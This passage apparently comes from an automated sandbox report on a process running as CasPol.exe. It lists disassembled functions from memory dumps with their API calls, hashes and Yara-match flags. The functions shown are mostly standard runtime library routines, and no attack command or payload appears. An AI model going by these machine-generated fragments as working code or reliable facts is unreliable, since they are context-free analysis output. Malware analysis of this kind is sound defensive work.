                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                                                                                                                                                                                  Function 10015615 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: 7a457cb0477eb42b08a3a08fc8a8e94251b23341f2866997a7d328c6d90e6a15
                                                                                                                                                                                                                                  • Instruction ID: b33cccb8fbb3b2afb8450da89680e76c8306b4c6ac74daa2382c705215a82a31
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a457cb0477eb42b08a3a08fc8a8e94251b23341f2866997a7d328c6d90e6a15
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B41B236A00200DFDB14CF78C981A5EB3E5EF89754F6A4168E515EF291EB32ED41CB81
                                                                                                                                                                                                                                  Function 0044FED3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53), ref: 0044FF20
                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?), ref: 0044FFA9
                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?,00000002,?), ref: 0044FFBB
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0044FFC4
                                                                                                                                                                                                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433627,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B31
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 313313983-0
                                                                                                                                                                                                                                  • Opcode ID: 88201f02e49098e6f592975d0299b58774541eebf8c41212138823b53665fa5d
                                                                                                                                                                                                                                  • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88201f02e49098e6f592975d0299b58774541eebf8c41212138823b53665fa5d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                                                                                                                                                                                  Function 04577153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0457715C
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0457717F
                                                                                                                                                                                                                                    • Part of subcall function 045756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04575702
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 045771A5
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 045771B8
                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 045771C7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 336800556-0
                                                                                                                                                                                                                                  • Opcode ID: 10671b48b74f1d8ab0d47481eb5661d3d51ceebd3ff2b8c0c0948788ed6e2158
                                                                                                                                                                                                                                  • Instruction ID: ce4e64ce1ef848a14f3ce3a3562c39eb0b109ddd70e2d7f3cc335417a1604e1f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 10671b48b74f1d8ab0d47481eb5661d3d51ceebd3ff2b8c0c0948788ed6e2158
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 070184726012157B27211AB67C88D7B6A6DFECAAE43140139BD04C7200FA64BC06A2B4
                                                                                                                                                                                                                                  Function 0044E13B Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                                                                                                                                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433627,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B31
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044E1A0
                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 336800556-0
                                                                                                                                                                                                                                  • Opcode ID: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                                                                                                                                                                                                                                  • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                                                                                                                                                                                  Function 10019622 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 1001962B
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001964E
                                                                                                                                                                                                                                    • Part of subcall function 10015A9F: RtlAllocateHeap.NTDLL(00000000,1000A5B7,?), ref: 10015AD1
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 10019674
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10019687
                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 10019696
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 336800556-0
                                                                                                                                                                                                                                  • Opcode ID: cd0ed9cec5a439b2b5836332e9c626755adc875954e91f3a7efe53195477cde9
                                                                                                                                                                                                                                  • Instruction ID: 6d2579429703740ef37404fee318dbdf00b11e5c7429adf95d1d5b6a0b07cec0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd0ed9cec5a439b2b5836332e9c626755adc875954e91f3a7efe53195477cde9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B001A272601725BF671296B65CCCC7F7AADDFC6EA5326022DFE04CA245DA71CD4281B0
                                                                                                                                                                                                                                  Function 04575B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000,0457636D,04575713,00000000,?,04572249,?,?,04571D66,00000000,?,?,00000000), ref: 04575B7F
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575BB4
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575BDB
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 04575BE8
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 04575BF1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                                                  • Opcode ID: d3d0724cee8e8a2bec1a749d5214d72f7b71c9c0e9cd1d238f954bab67cec386
                                                                                                                                                                                                                                  • Instruction ID: ad81f1f023bdc7a9648c75068fa866f7bd446e298e3a6f042c0993db6664215e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d3d0724cee8e8a2bec1a749d5214d72f7b71c9c0e9cd1d238f954bab67cec386
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4401A97624560AFBE71266347C88D3B2669FFC19787100138FD1FA6581FE65BC0A7164
                                                                                                                                                                                                                                  Function 00446F43 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,?,00445359,00446B42,00000000,?,00433627,?,?,00402BE9,?,00402629,00000000,?,00402578), ref: 00446F48
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00446F7D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00446FA4
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00446FB1
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00446FBA
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                                                  • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                                                                                                                                  • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                                                                                                                                                                                                  Function 10016B00 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(1000A5B7,1000A5B7,?,100160F1,10015AE2,?,?,1000C7AC,?,?,?,?,?,1000A4CA,1000A5B7,?), ref: 10016B05
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10016B3A
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10016B61
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,1000A5B7), ref: 10016B6E
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,1000A5B7), ref: 10016B77
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                                                  • Opcode ID: 5c84e16c2a66fa28b03aad63272ec2f76a486bc5c072b97fff44e3eae95c9b85
                                                                                                                                                                                                                                  • Instruction ID: ac220c7f5632b09d9213959bcab330a47a9ba60472251cba742aca4957c4ce2f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c84e16c2a66fa28b03aad63272ec2f76a486bc5c072b97fff44e3eae95c9b85
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6701D13A648611A6D216D6744CC6E4B32A9EBC97A13794128FA19DE182FF31CCD25061
                                                                                                                                                                                                                                  Function 0041B37D Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                                                                                                                                                  • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3C8
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CloseHandleOpen$FileImageName
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2951400881-0
                                                                                                                                                                                                                                  • Opcode ID: b8726634bc2d24e9c2e2bc3987753934be5434803c47aebb3633f4ceaff1eb89
                                                                                                                                                                                                                                  • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8726634bc2d24e9c2e2bc3987753934be5434803c47aebb3633f4ceaff1eb89
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                                                                                                                                                                                                  Function 04571E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,045710DF,?,?,?,00000000), ref: 04571E9A
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,045710DF,?,?,?,00000000), ref: 04571EAC
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,045710DF,?,?,?,00000000), ref: 04571EB3
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,045710DF,?,?,?,00000000), ref: 04571EC8
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,045710DF,?,045710DF,?,?,?,00000000), ref: 04571ED3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 493641738-0
                                                                                                                                                                                                                                  • Opcode ID: b2df0516d234471d4eba45c3135ee15dc28c3513cfb5f6dce3bf75d4f5658b82
                                                                                                                                                                                                                                  • Instruction ID: 1a73c2ba86bef545ef1dbf3a2f49197680cfc85f68ddf59b6a560181e767a0f7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2df0516d234471d4eba45c3135ee15dc28c3513cfb5f6dce3bf75d4f5658b82
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42F089261001107AE6213729BC85E7F7B7CFFC5B60F040029F90893290BB546C46A2B5
                                                                                                                                                                                                                                  Function 045791B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 045791D0
                                                                                                                                                                                                                                    • Part of subcall function 0457571E: HeapFree.KERNEL32(00000000,00000000,?,0457924F,?,00000000,?,00000000,?,04579276,?,00000007,?,?,04577E5A,?), ref: 04575734
                                                                                                                                                                                                                                    • Part of subcall function 0457571E: GetLastError.KERNEL32(?,?,0457924F,?,00000000,?,00000000,?,04579276,?,00000007,?,?,04577E5A,?,?), ref: 04575746
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 045791E2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 045791F4
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04579206
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04579218
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 2c06a57f7d7b212f45a7f5959a1baab9acc1651a3e4217990bc16abf97e81185
                                                                                                                                                                                                                                  • Instruction ID: e9d75e962b5e9aab3e80bfdd616339536a51f954efac6dd057bc748c616411da
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c06a57f7d7b212f45a7f5959a1baab9acc1651a3e4217990bc16abf97e81185
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FF062B2524644B7A620EB58F5C4C0E7BD9FA80794354182DF90AE7900DB35FC80AA64
                                                                                                                                                                                                                                  Function 0044F79D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044F7B5
                                                                                                                                                                                                                                    • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                                                                                                                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044F7C7
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044F7D9
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044F7EB
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044F7FD
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                                                                                                                                  • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                                                                                                                                                                                  Function 1001CC95 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001CCAD
                                                                                                                                                                                                                                    • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
                                                                                                                                                                                                                                    • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001CCBF
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001CCD1
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001CCE3
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001CCF5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
